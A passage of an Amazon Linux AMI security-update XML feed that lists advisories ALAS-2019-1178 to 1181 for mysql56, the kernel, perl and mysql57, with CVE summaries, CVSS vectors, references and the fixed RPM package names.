release="2.6.17.1.79.amzn1" epoch="1" arch="x86_64"><filename>Packages/java-1.7.0-openjdk-devel-1.7.0.211-2.6.17.1.79.amzn1.x86_64.rpm</filename></package><package name="java-1.7.0-openjdk-demo" version="1.7.0.211" release="2.6.17.1.79.amzn1" epoch="1" arch="x86_64"><filename>Packages/java-1.7.0-openjdk-demo-1.7.0.211-2.6.17.1.79.amzn1.x86_64.rpm</filename></package><package name="java-1.7.0-openjdk-src" version="1.7.0.211" release="2.6.17.1.79.amzn1" epoch="1" arch="i686"><filename>Packages/java-1.7.0-openjdk-src-1.7.0.211-2.6.17.1.79.amzn1.i686.rpm</filename></package><package name="java-1.7.0-openjdk-demo" version="1.7.0.211" release="2.6.17.1.79.amzn1" epoch="1" arch="i686"><filename>Packages/java-1.7.0-openjdk-demo-1.7.0.211-2.6.17.1.79.amzn1.i686.rpm</filename></package><package name="java-1.7.0-openjdk-devel" 
version="1.7.0.211" release="2.6.17.1.79.amzn1" epoch="1" arch="i686"><filename>Packages/java-1.7.0-openjdk-devel-1.7.0.211-2.6.17.1.79.amzn1.i686.rpm</filename></package><package name="java-1.7.0-openjdk-debuginfo" version="1.7.0.211" release="2.6.17.1.79.amzn1" epoch="1" arch="i686"><filename>Packages/java-1.7.0-openjdk-debuginfo-1.7.0.211-2.6.17.1.79.amzn1.i686.rpm</filename></package><package name="java-1.7.0-openjdk" version="1.7.0.211" release="2.6.17.1.79.amzn1" epoch="1" arch="i686"><filename>Packages/java-1.7.0-openjdk-1.7.0.211-2.6.17.1.79.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2019-1178</id><title>Amazon Linux AMI 2014.03 - ALAS-2019-1178: medium priority package update for mysql56</title><issued date="2019-03-20 22:27:00" /><updated date="2019-03-25 23:08:00" /><severity>medium</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2019-2537:
Vulnerability in the MySQL Server component of Oracle MySQL (subcomponent: Server: DDL). Supported versions that are affected are 5.6.42 and prior, 5.7.24 and prior and 8.0.13 and prior. Easily exploitable vulnerability allows high privileged attacker with network access via multiple protocols to compromise MySQL Server. Successful attacks of this vulnerability can result in unauthorized ability to cause a hang or frequently repeatable crash (complete DOS) of MySQL Server. CVSS 3.0 Base Score 4.9 (Availability impacts). CVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:H/UI:N/S:U/C:N/I:N/A:H).
1666763:
CVE-2019-2537 mysql: Server: DDL unspecified vulnerability (CPU Jan 2019)
CVE-2019-2534:
Vulnerability in the MySQL Server component of Oracle MySQL (subcomponent: Server: Replication). Supported versions that are affected are 5.6.42 and prior, 5.7.24 and prior and 8.0.13 and prior. Easily exploitable vulnerability allows low privileged attacker with network access via multiple protocols to compromise MySQL Server. Successful attacks of this vulnerability can result in unauthorized access to critical data or complete access to all MySQL Server accessible data as well as unauthorized update, insert or delete access to some of MySQL Server accessible data. CVSS 3.0 Base Score 7.1 (Confidentiality and Integrity impacts). CVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:L/A:N).
1666760:
CVE-2019-2534 mysql: Server: Replication unspecified vulnerability (CPU Jan 2019)
CVE-2019-2531:
Vulnerability in the MySQL Server component of Oracle MySQL (subcomponent: Server: Replication). Supported versions that are affected are 5.6.42 and prior, 5.7.24 and prior and 8.0.13 and prior. Easily exploitable vulnerability allows high privileged attacker with network access via multiple protocols to compromise MySQL Server. Successful attacks of this vulnerability can result in unauthorized ability to cause a hang or frequently repeatable crash (complete DOS) of MySQL Server. CVSS 3.0 Base Score 4.9 (Availability impacts). CVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:H/UI:N/S:U/C:N/I:N/A:H).
1666757:
CVE-2019-2531 mysql: Server: Replication unspecified vulnerability (CPU Jan 2019)
CVE-2019-2529:
Vulnerability in the MySQL Server component of Oracle MySQL (subcomponent: Server: Optimizer). Supported versions that are affected are 5.6.42 and prior, 5.7.24 and prior and 8.0.13 and prior. Easily exploitable vulnerability allows low privileged attacker with network access via multiple protocols to compromise MySQL Server. Successful attacks of this vulnerability can result in unauthorized ability to cause a hang or frequently repeatable crash (complete DOS) of MySQL Server. CVSS 3.0 Base Score 6.5 (Availability impacts). CVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H).
1666755:
CVE-2019-2529 mysql: Server: Optimizer unspecified vulnerability (CPU Jan 2019)
CVE-2019-2507:
Vulnerability in the MySQL Server component of Oracle MySQL (subcomponent: Server: Optimizer). Supported versions that are affected are 5.6.42 and prior, 5.7.24 and prior and 8.0.13 and prior. Easily exploitable vulnerability allows high privileged attacker with network access via multiple protocols to compromise MySQL Server. Successful attacks of this vulnerability can result in unauthorized ability to cause a hang or frequently repeatable crash (complete DOS) of MySQL Server. CVSS 3.0 Base Score 4.9 (Availability impacts). CVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:H/UI:N/S:U/C:N/I:N/A:H).
1666750:
CVE-2019-2507 mysql: Server: Optimizer unspecified vulnerability (CPU Jan 2019)
CVE-2019-2503:
Vulnerability in the MySQL Server component of Oracle MySQL (subcomponent: Server: Connection Handling). Supported versions that are affected are 5.6.42 and prior, 5.7.24 and prior and 8.0.13 and prior. Difficult to exploit vulnerability allows low privileged attacker with access to the physical communication segment attached to the hardware where the MySQL Server executes to compromise MySQL Server. Successful attacks of this vulnerability can result in unauthorized access to critical data or complete access to all MySQL Server accessible data and unauthorized ability to cause a hang or frequently repeatable crash (complete DOS) of MySQL Server. CVSS 3.0 Base Score 6.4 (Confidentiality and Availability impacts). CVSS Vector: (CVSS:3.0/AV:A/AC:H/PR:L/UI:N/S:U/C:H/I:N/A:H).
1666749:
CVE-2019-2503 mysql: Server: Connection Handling unspecified vulnerability (CPU Jan 2019)
CVE-2019-2482:
Vulnerability in the MySQL Server component of Oracle MySQL (subcomponent: Server: PS). Supported versions that are affected are 5.6.42 and prior, 5.7.24 and prior and 8.0.13 and prior. Easily exploitable vulnerability allows low privileged attacker with network access via multiple protocols to compromise MySQL Server. Successful attacks of this vulnerability can result in unauthorized ability to cause a hang or frequently repeatable crash (complete DOS) of MySQL Server. CVSS 3.0 Base Score 6.5 (Availability impacts). CVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H).
1666744:
CVE-2019-2482 mysql: Server: PS unspecified vulnerability (CPU Jan 2019)
CVE-2019-2481:
Vulnerability in the MySQL Server component of Oracle MySQL (subcomponent: Server: Optimizer). Supported versions that are affected are 5.6.42 and prior, 5.7.24 and prior and 8.0.13 and prior. Easily exploitable vulnerability allows high privileged attacker with network access via multiple protocols to compromise MySQL Server. Successful attacks of this vulnerability can result in unauthorized ability to cause a hang or frequently repeatable crash (complete DOS) of MySQL Server. CVSS 3.0 Base Score 4.9 (Availability impacts). CVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:H/UI:N/S:U/C:N/I:N/A:H).
1666743:
CVE-2019-2481 mysql: Server: Optimizer unspecified vulnerability (CPU Jan 2019)
CVE-2019-2455:
Vulnerability in the MySQL Server component of Oracle MySQL (subcomponent: Server: Parser). Supported versions that are affected are 5.6.42 and prior, 5.7.24 and prior and 8.0.13 and prior. Easily exploitable vulnerability allows low privileged attacker with network access via multiple protocols to compromise MySQL Server. Successful attacks of this vulnerability can result in unauthorized ability to cause a hang or frequently repeatable crash (complete DOS) of MySQL Server. CVSS 3.0 Base Score 6.5 (Availability impacts). CVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H).
1666742:
CVE-2019-2455 mysql: Server: Parser unspecified vulnerability (CPU Jan 2019)
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-2455" title="" id="CVE-2019-2455" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-2481" title="" id="CVE-2019-2481" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-2482" title="" id="CVE-2019-2482" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-2503" title="" id="CVE-2019-2503" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-2507" title="" id="CVE-2019-2507" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-2529" title="" id="CVE-2019-2529" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-2531" title="" id="CVE-2019-2531" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-2534" title="" id="CVE-2019-2534" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-2537" title="" id="CVE-2019-2537" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="mysql56-test" version="5.6.43" release="1.32.amzn1" epoch="0" arch="x86_64"><filename>Packages/mysql56-test-5.6.43-1.32.amzn1.x86_64.rpm</filename></package><package name="mysql56-bench" version="5.6.43" release="1.32.amzn1" epoch="0" arch="x86_64"><filename>Packages/mysql56-bench-5.6.43-1.32.amzn1.x86_64.rpm</filename></package><package name="mysql56-server" version="5.6.43" release="1.32.amzn1" epoch="0" arch="x86_64"><filename>Packages/mysql56-server-5.6.43-1.32.amzn1.x86_64.rpm</filename></package><package name="mysql56-embedded" version="5.6.43" release="1.32.amzn1" epoch="0" arch="x86_64"><filename>Packages/mysql56-embedded-5.6.43-1.32.amzn1.x86_64.rpm</filename></package><package name="mysql56-debuginfo" version="5.6.43" release="1.32.amzn1" epoch="0" 
arch="x86_64"><filename>Packages/mysql56-debuginfo-5.6.43-1.32.amzn1.x86_64.rpm</filename></package><package name="mysql56-libs" version="5.6.43" release="1.32.amzn1" epoch="0" arch="x86_64"><filename>Packages/mysql56-libs-5.6.43-1.32.amzn1.x86_64.rpm</filename></package><package name="mysql56-devel" version="5.6.43" release="1.32.amzn1" epoch="0" arch="x86_64"><filename>Packages/mysql56-devel-5.6.43-1.32.amzn1.x86_64.rpm</filename></package><package name="mysql56-errmsg" version="5.6.43" release="1.32.amzn1" epoch="0" arch="x86_64"><filename>Packages/mysql56-errmsg-5.6.43-1.32.amzn1.x86_64.rpm</filename></package><package name="mysql56-common" version="5.6.43" release="1.32.amzn1" epoch="0" arch="x86_64"><filename>Packages/mysql56-common-5.6.43-1.32.amzn1.x86_64.rpm</filename></package><package name="mysql56-embedded-devel" version="5.6.43" release="1.32.amzn1" epoch="0" arch="x86_64"><filename>Packages/mysql56-embedded-devel-5.6.43-1.32.amzn1.x86_64.rpm</filename></package><package name="mysql56" version="5.6.43" release="1.32.amzn1" epoch="0" arch="x86_64"><filename>Packages/mysql56-5.6.43-1.32.amzn1.x86_64.rpm</filename></package><package name="mysql56-bench" version="5.6.43" release="1.32.amzn1" epoch="0" arch="i686"><filename>Packages/mysql56-bench-5.6.43-1.32.amzn1.i686.rpm</filename></package><package name="mysql56-libs" version="5.6.43" release="1.32.amzn1" epoch="0" arch="i686"><filename>Packages/mysql56-libs-5.6.43-1.32.amzn1.i686.rpm</filename></package><package name="mysql56-errmsg" version="5.6.43" release="1.32.amzn1" epoch="0" arch="i686"><filename>Packages/mysql56-errmsg-5.6.43-1.32.amzn1.i686.rpm</filename></package><package name="mysql56-embedded-devel" version="5.6.43" release="1.32.amzn1" epoch="0" arch="i686"><filename>Packages/mysql56-embedded-devel-5.6.43-1.32.amzn1.i686.rpm</filename></package><package name="mysql56-server" version="5.6.43" release="1.32.amzn1" epoch="0" 
arch="i686"><filename>Packages/mysql56-server-5.6.43-1.32.amzn1.i686.rpm</filename></package><package name="mysql56-debuginfo" version="5.6.43" release="1.32.amzn1" epoch="0" arch="i686"><filename>Packages/mysql56-debuginfo-5.6.43-1.32.amzn1.i686.rpm</filename></package><package name="mysql56-common" version="5.6.43" release="1.32.amzn1" epoch="0" arch="i686"><filename>Packages/mysql56-common-5.6.43-1.32.amzn1.i686.rpm</filename></package><package name="mysql56-embedded" version="5.6.43" release="1.32.amzn1" epoch="0" arch="i686"><filename>Packages/mysql56-embedded-5.6.43-1.32.amzn1.i686.rpm</filename></package><package name="mysql56" version="5.6.43" release="1.32.amzn1" epoch="0" arch="i686"><filename>Packages/mysql56-5.6.43-1.32.amzn1.i686.rpm</filename></package><package name="mysql56-test" version="5.6.43" release="1.32.amzn1" epoch="0" arch="i686"><filename>Packages/mysql56-test-5.6.43-1.32.amzn1.i686.rpm</filename></package><package name="mysql56-devel" version="5.6.43" release="1.32.amzn1" epoch="0" arch="i686"><filename>Packages/mysql56-devel-5.6.43-1.32.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2019-1179</id><title>Amazon Linux AMI 2014.03 - ALAS-2019-1179: important priority package update for kernel</title><issued date="2019-03-20 22:39:00" /><updated date="2019-03-25 23:05:00" /><severity>important</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2019-9213:
A flaw was found in mmap in the Linux kernel allowing the process to map a null page. This allows attackers to abuse this mechanism to turn null pointer dereferences into workable exploits.
1686136:
CVE-2019-9213 kernel: lack of check for mmap minimum address in expand_downwards in mm/mmap.c leads to NULL pointer dereferences exploit on non-SMAP platforms
CVE-2019-8980:
A kernel memory leak was found in the kernel_read_file() function in the fs/exec.c file in the Linux kernel. An attacker could use this flaw to cause a memory leak and thus a denial of service (DoS).
1679972:
CVE-2019-8980 kernel: memory leak in the kernel_read_file function in fs/exec.c allows to cause a denial of service
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-8980" title="" id="CVE-2019-8980" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-9213" title="" id="CVE-2019-9213" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="kernel-debuginfo" version="4.14.106" release="79.86.amzn1" epoch="0" arch="x86_64"><filename>Packages/kernel-debuginfo-4.14.106-79.86.amzn1.x86_64.rpm</filename></package><package name="kernel-tools" version="4.14.106" release="79.86.amzn1" epoch="0" arch="x86_64"><filename>Packages/kernel-tools-4.14.106-79.86.amzn1.x86_64.rpm</filename></package><package name="kernel-debuginfo-common-x86_64" version="4.14.106" release="79.86.amzn1" epoch="0" arch="x86_64"><filename>Packages/kernel-debuginfo-common-x86_64-4.14.106-79.86.amzn1.x86_64.rpm</filename></package><package name="perf" version="4.14.106" release="79.86.amzn1" epoch="0" arch="x86_64"><filename>Packages/perf-4.14.106-79.86.amzn1.x86_64.rpm</filename></package><package name="kernel-headers" version="4.14.106" release="79.86.amzn1" epoch="0" arch="x86_64"><filename>Packages/kernel-headers-4.14.106-79.86.amzn1.x86_64.rpm</filename></package><package name="kernel-tools-debuginfo" version="4.14.106" release="79.86.amzn1" epoch="0" arch="x86_64"><filename>Packages/kernel-tools-debuginfo-4.14.106-79.86.amzn1.x86_64.rpm</filename></package><package name="kernel-tools-devel" version="4.14.106" release="79.86.amzn1" epoch="0" arch="x86_64"><filename>Packages/kernel-tools-devel-4.14.106-79.86.amzn1.x86_64.rpm</filename></package><package name="perf-debuginfo" version="4.14.106" release="79.86.amzn1" epoch="0" arch="x86_64"><filename>Packages/perf-debuginfo-4.14.106-79.86.amzn1.x86_64.rpm</filename></package><package name="kernel" version="4.14.106" release="79.86.amzn1" epoch="0" 
arch="x86_64"><filename>Packages/kernel-4.14.106-79.86.amzn1.x86_64.rpm</filename></package><package name="kernel-devel" version="4.14.106" release="79.86.amzn1" epoch="0" arch="x86_64"><filename>Packages/kernel-devel-4.14.106-79.86.amzn1.x86_64.rpm</filename></package><package name="kernel-debuginfo-common-i686" version="4.14.106" release="79.86.amzn1" epoch="0" arch="i686"><filename>Packages/kernel-debuginfo-common-i686-4.14.106-79.86.amzn1.i686.rpm</filename></package><package name="kernel-headers" version="4.14.106" release="79.86.amzn1" epoch="0" arch="i686"><filename>Packages/kernel-headers-4.14.106-79.86.amzn1.i686.rpm</filename></package><package name="kernel-tools-debuginfo" version="4.14.106" release="79.86.amzn1" epoch="0" arch="i686"><filename>Packages/kernel-tools-debuginfo-4.14.106-79.86.amzn1.i686.rpm</filename></package><package name="kernel" version="4.14.106" release="79.86.amzn1" epoch="0" arch="i686"><filename>Packages/kernel-4.14.106-79.86.amzn1.i686.rpm</filename></package><package name="perf" version="4.14.106" release="79.86.amzn1" epoch="0" arch="i686"><filename>Packages/perf-4.14.106-79.86.amzn1.i686.rpm</filename></package><package name="kernel-devel" version="4.14.106" release="79.86.amzn1" epoch="0" arch="i686"><filename>Packages/kernel-devel-4.14.106-79.86.amzn1.i686.rpm</filename></package><package name="kernel-debuginfo" version="4.14.106" release="79.86.amzn1" epoch="0" arch="i686"><filename>Packages/kernel-debuginfo-4.14.106-79.86.amzn1.i686.rpm</filename></package><package name="kernel-tools-devel" version="4.14.106" release="79.86.amzn1" epoch="0" arch="i686"><filename>Packages/kernel-tools-devel-4.14.106-79.86.amzn1.i686.rpm</filename></package><package name="kernel-tools" version="4.14.106" release="79.86.amzn1" epoch="0" arch="i686"><filename>Packages/kernel-tools-4.14.106-79.86.amzn1.i686.rpm</filename></package><package name="perf-debuginfo" version="4.14.106" release="79.86.amzn1" epoch="0" 
arch="i686"><filename>Packages/perf-debuginfo-4.14.106-79.86.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2019-1180</id><title>Amazon Linux AMI 2014.03 - ALAS-2019-1180: important priority package update for perl</title><issued date="2019-03-20 23:05:00" /><updated date="2019-03-25 23:04:00" /><severity>important</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2018-18311:
Perl before 5.26.3 and 5.28.x before 5.28.1 has a buffer overflow via a crafted regular expression that triggers invalid write operations.
1646730:
CVE-2018-18311 perl: Integer overflow leading to buffer overflow in Perl_my_setenv()
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-18311" title="" id="CVE-2018-18311" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="perl-core" version="5.16.3" release="294.43.amzn1" epoch="0" arch="x86_64"><filename>Packages/perl-core-5.16.3-294.43.amzn1.x86_64.rpm</filename></package><package name="perl-debuginfo" version="5.16.3" release="294.43.amzn1" epoch="4" arch="x86_64"><filename>Packages/perl-debuginfo-5.16.3-294.43.amzn1.x86_64.rpm</filename></package><package name="perl-Object-Accessor" version="0.42" release="294.43.amzn1" epoch="1" arch="noarch"><filename>Packages/perl-Object-Accessor-0.42-294.43.amzn1.noarch.rpm</filename></package><package name="perl-Locale-Maketext-Simple" version="0.21" release="294.43.amzn1" epoch="1" arch="noarch"><filename>Packages/perl-Locale-Maketext-Simple-0.21-294.43.amzn1.noarch.rpm</filename></package><package name="perl-Pod-Escapes" version="1.04" release="294.43.amzn1" epoch="1" arch="noarch"><filename>Packages/perl-Pod-Escapes-1.04-294.43.amzn1.noarch.rpm</filename></package><package name="perl-Module-Loaded" version="0.08" release="294.43.amzn1" epoch="1" arch="noarch"><filename>Packages/perl-Module-Loaded-0.08-294.43.amzn1.noarch.rpm</filename></package><package name="perl-IO-Zlib" version="1.10" release="294.43.amzn1" epoch="1" arch="noarch"><filename>Packages/perl-IO-Zlib-1.10-294.43.amzn1.noarch.rpm</filename></package><package name="perl-CPAN" version="1.9800" release="294.43.amzn1" epoch="0" arch="noarch"><filename>Packages/perl-CPAN-1.9800-294.43.amzn1.noarch.rpm</filename></package><package name="perl-ExtUtils-Embed" version="1.30" release="294.43.amzn1" epoch="0" arch="noarch"><filename>Packages/perl-ExtUtils-Embed-1.30-294.43.amzn1.noarch.rpm</filename></package><package name="perl-macros" version="5.16.3" release="294.43.amzn1" epoch="4" 
arch="x86_64"><filename>Packages/perl-macros-5.16.3-294.43.amzn1.x86_64.rpm</filename></package><package name="perl" version="5.16.3" release="294.43.amzn1" epoch="4" arch="x86_64"><filename>Packages/perl-5.16.3-294.43.amzn1.x86_64.rpm</filename></package><package name="perl-ExtUtils-CBuilder" version="0.28.2.6" release="294.43.amzn1" epoch="1" arch="noarch"><filename>Packages/perl-ExtUtils-CBuilder-0.28.2.6-294.43.amzn1.noarch.rpm</filename></package><package name="perl-ExtUtils-Install" version="1.58" release="294.43.amzn1" epoch="0" arch="noarch"><filename>Packages/perl-ExtUtils-Install-1.58-294.43.amzn1.noarch.rpm</filename></package><package name="perl-Time-Piece" version="1.20.1" release="294.43.amzn1" epoch="0" arch="x86_64"><filename>Packages/perl-Time-Piece-1.20.1-294.43.amzn1.x86_64.rpm</filename></package><package name="perl-devel" version="5.16.3" release="294.43.amzn1" epoch="4" arch="x86_64"><filename>Packages/perl-devel-5.16.3-294.43.amzn1.x86_64.rpm</filename></package><package name="perl-libs" version="5.16.3" release="294.43.amzn1" epoch="4" arch="x86_64"><filename>Packages/perl-libs-5.16.3-294.43.amzn1.x86_64.rpm</filename></package><package name="perl-Package-Constants" version="0.02" release="294.43.amzn1" epoch="1" arch="noarch"><filename>Packages/perl-Package-Constants-0.02-294.43.amzn1.noarch.rpm</filename></package><package name="perl-tests" version="5.16.3" release="294.43.amzn1" epoch="4" arch="x86_64"><filename>Packages/perl-tests-5.16.3-294.43.amzn1.x86_64.rpm</filename></package><package name="perl-Module-CoreList" version="2.76.02" release="294.43.amzn1" epoch="1" arch="noarch"><filename>Packages/perl-Module-CoreList-2.76.02-294.43.amzn1.noarch.rpm</filename></package><package name="perl-tests" version="5.16.3" release="294.43.amzn1" epoch="4" arch="i686"><filename>Packages/perl-tests-5.16.3-294.43.amzn1.i686.rpm</filename></package><package name="perl-core" version="5.16.3" release="294.43.amzn1" epoch="0" 
arch="i686"><filename>Packages/perl-core-5.16.3-294.43.amzn1.i686.rpm</filename></package><package name="perl-Time-Piece" version="1.20.1" release="294.43.amzn1" epoch="0" arch="i686"><filename>Packages/perl-Time-Piece-1.20.1-294.43.amzn1.i686.rpm</filename></package><package name="perl" version="5.16.3" release="294.43.amzn1" epoch="4" arch="i686"><filename>Packages/perl-5.16.3-294.43.amzn1.i686.rpm</filename></package><package name="perl-libs" version="5.16.3" release="294.43.amzn1" epoch="4" arch="i686"><filename>Packages/perl-libs-5.16.3-294.43.amzn1.i686.rpm</filename></package><package name="perl-macros" version="5.16.3" release="294.43.amzn1" epoch="4" arch="i686"><filename>Packages/perl-macros-5.16.3-294.43.amzn1.i686.rpm</filename></package><package name="perl-devel" version="5.16.3" release="294.43.amzn1" epoch="4" arch="i686"><filename>Packages/perl-devel-5.16.3-294.43.amzn1.i686.rpm</filename></package><package name="perl-debuginfo" version="5.16.3" release="294.43.amzn1" epoch="4" arch="i686"><filename>Packages/perl-debuginfo-5.16.3-294.43.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2019-1181</id><title>Amazon Linux AMI 2014.03 - ALAS-2019-1181: medium priority package update for mysql57</title><issued date="2019-03-20 23:45:00" /><updated date="2019-03-25 23:03:00" /><severity>medium</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2019-2537:
Vulnerability in the MySQL Server component of Oracle MySQL (subcomponent: Server: DDL). Supported versions that are affected are 5.6.42 and prior, 5.7.24 and prior and 8.0.13 and prior. Easily exploitable vulnerability allows high privileged attacker with network access via multiple protocols to compromise MySQL Server. Successful attacks of this vulnerability can result in unauthorized ability to cause a hang or frequently repeatable crash (complete DOS) of MySQL Server. CVSS 3.0 Base Score 4.9 (Availability impacts). CVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:H/UI:N/S:U/C:N/I:N/A:H).
1666763:
CVE-2019-2537 mysql: Server: DDL unspecified vulnerability (CPU Jan 2019)
CVE-2019-2534:
Vulnerability in the MySQL Server component of Oracle MySQL (subcomponent: Server: Replication). Supported versions that are affected are 5.6.42 and prior, 5.7.24 and prior and 8.0.13 and prior. Easily exploitable vulnerability allows low privileged attacker with network access via multiple protocols to compromise MySQL Server. Successful attacks of this vulnerability can result in unauthorized access to critical data or complete access to all MySQL Server accessible data as well as unauthorized update, insert or delete access to some of MySQL Server accessible data. CVSS 3.0 Base Score 7.1 (Confidentiality and Integrity impacts). CVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:L/A:N).
1666760:
CVE-2019-2534 mysql: Server: Replication unspecified vulnerability (CPU Jan 2019)
CVE-2019-2532:
Vulnerability in the MySQL Server component of Oracle MySQL (subcomponent: Server: Security: Privileges). Supported versions that are affected are 5.7.24 and prior and 8.0.13 and prior. Easily exploitable vulnerability allows high privileged attacker with network access via multiple protocols to compromise MySQL Server. Successful attacks of this vulnerability can result in unauthorized ability to cause a hang or frequently repeatable crash (complete DOS) of MySQL Server. CVSS 3.0 Base Score 4.9 (Availability impacts). CVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:H/UI:N/S:U/C:N/I:N/A:H).
1666758:
CVE-2019-2532 mysql: Server: Security: Privileges unspecified vulnerability (CPU Jan 2019)
CVE-2019-2531:
Vulnerability in the MySQL Server component of Oracle MySQL (subcomponent: Server: Replication). Supported versions that are affected are 5.6.42 and prior, 5.7.24 and prior and 8.0.13 and prior. Easily exploitable vulnerability allows high privileged attacker with network access via multiple protocols to compromise MySQL Server. Successful attacks of this vulnerability can result in unauthorized ability to cause a hang or frequently repeatable crash (complete DOS) of MySQL Server. CVSS 3.0 Base Score 4.9 (Availability impacts). CVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:H/UI:N/S:U/C:N/I:N/A:H).
1666757:
CVE-2019-2531 mysql: Server: Replication unspecified vulnerability (CPU Jan 2019)
CVE-2019-2529:
Vulnerability in the MySQL Server component of Oracle MySQL (subcomponent: Server: Optimizer). Supported versions that are affected are 5.6.42 and prior, 5.7.24 and prior and 8.0.13 and prior. Easily exploitable vulnerability allows low privileged attacker with network access via multiple protocols to compromise MySQL Server. Successful attacks of this vulnerability can result in unauthorized ability to cause a hang or frequently repeatable crash (complete DOS) of MySQL Server. CVSS 3.0 Base Score 6.5 (Availability impacts). CVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H).
1666755:
CVE-2019-2529 mysql: Server: Optimizer unspecified vulnerability (CPU Jan 2019)
CVE-2019-2528:
Vulnerability in the MySQL Server component of Oracle MySQL (subcomponent: Server: Partition). Supported versions that are affected are 5.7.24 and prior and 8.0.13 and prior. Easily exploitable vulnerability allows high privileged attacker with network access via multiple protocols to compromise MySQL Server. Successful attacks of this vulnerability can result in unauthorized ability to cause a hang or frequently repeatable crash (complete DOS) of MySQL Server. CVSS 3.0 Base Score 4.9 (Availability impacts). CVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:H/UI:N/S:U/C:N/I:N/A:H).
1666753:
CVE-2019-2528 mysql: Server: Partition unspecified vulnerability (CPU Jan 2019)
CVE-2019-2510:
Vulnerability in the MySQL Server component of Oracle MySQL (subcomponent: InnoDB). Supported versions that are affected are 5.7.24 and prior and 8.0.13 and prior. Easily exploitable vulnerability allows high privileged attacker with network access via multiple protocols to compromise MySQL Server. Successful attacks of this vulnerability can result in unauthorized ability to cause a hang or frequently repeatable crash (complete DOS) of MySQL Server. CVSS 3.0 Base Score 4.9 (Availability impacts). CVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:H/UI:N/S:U/C:N/I:N/A:H).
1666751:
CVE-2019-2510 mysql: InnoDB unspecified vulnerability (CPU Jan 2019)
CVE-2019-2507:
Vulnerability in the MySQL Server component of Oracle MySQL (subcomponent: Server: Optimizer). Supported versions that are affected are 5.6.42 and prior, 5.7.24 and prior and 8.0.13 and prior. Easily exploitable vulnerability allows high privileged attacker with network access via multiple protocols to compromise MySQL Server. Successful attacks of this vulnerability can result in unauthorized ability to cause a hang or frequently repeatable crash (complete DOS) of MySQL Server. CVSS 3.0 Base Score 4.9 (Availability impacts). CVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:H/UI:N/S:U/C:N/I:N/A:H).
1666750:
CVE-2019-2507 mysql: Server: Optimizer unspecified vulnerability (CPU Jan 2019)
CVE-2019-2503:
Vulnerability in the MySQL Server component of Oracle MySQL (subcomponent: Server: Connection Handling). Supported versions that are affected are 5.6.42 and prior, 5.7.24 and prior and 8.0.13 and prior. Difficult to exploit vulnerability allows low privileged attacker with access to the physical communication segment attached to the hardware where the MySQL Server executes to compromise MySQL Server. Successful attacks of this vulnerability can result in unauthorized access to critical data or complete access to all MySQL Server accessible data and unauthorized ability to cause a hang or frequently repeatable crash (complete DOS) of MySQL Server. CVSS 3.0 Base Score 6.4 (Confidentiality and Availability impacts). CVSS Vector: (CVSS:3.0/AV:A/AC:H/PR:L/UI:N/S:U/C:H/I:N/A:H).
1666749:
CVE-2019-2503 mysql: Server: Connection Handling unspecified vulnerability (CPU Jan 2019)
CVE-2019-2486:
Vulnerability in the MySQL Server component of Oracle MySQL (subcomponent: Server: Security: Privileges). Supported versions that are affected are 5.7.24 and prior and 8.0.13 and prior. Easily exploitable vulnerability allows high privileged attacker with network access via multiple protocols to compromise MySQL Server. Successful attacks of this vulnerability can result in unauthorized ability to cause a hang or frequently repeatable crash (complete DOS) of MySQL Server. CVSS 3.0 Base Score 4.9 (Availability impacts). CVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:H/UI:N/S:U/C:N/I:N/A:H).
